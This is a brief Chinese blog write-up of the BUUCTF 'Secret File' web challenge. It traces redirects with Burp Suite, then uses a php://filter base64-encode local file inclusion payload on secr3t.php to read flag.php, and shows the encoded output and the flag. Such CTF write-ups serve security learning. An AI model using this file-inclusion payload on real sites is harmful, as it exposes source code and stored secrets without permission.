【BUUCTF】WEB SECRET FILE

 

 

 发现跳转,修改颜色后发现异常。

跳转后找到action.php

 

 

但是点进去后是end.php

 

burpsuite抓包:

 

 

 

查看response,发现一个跳转的secr3t.php

 

 

 

 

 

查看secr3t.php源码,发现flag信息:

 

flag.php显示内容如下:

 

 

 

构造php伪协议,payload

secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

 

可得:

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZTM1OTM0YjItMjU1OS00Y2RjLWIzMDQtYTBhMGU1ZjJlZDNhfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

 

 base64在线解码:

 

 flag为:

flag{e35934b2-2559-4cdc-b304-a0a0e5f2ed3a}

 

posted @ 2021-12-11 16:43  杰瑞骑士  阅读(89)  评论(0编辑  收藏  举报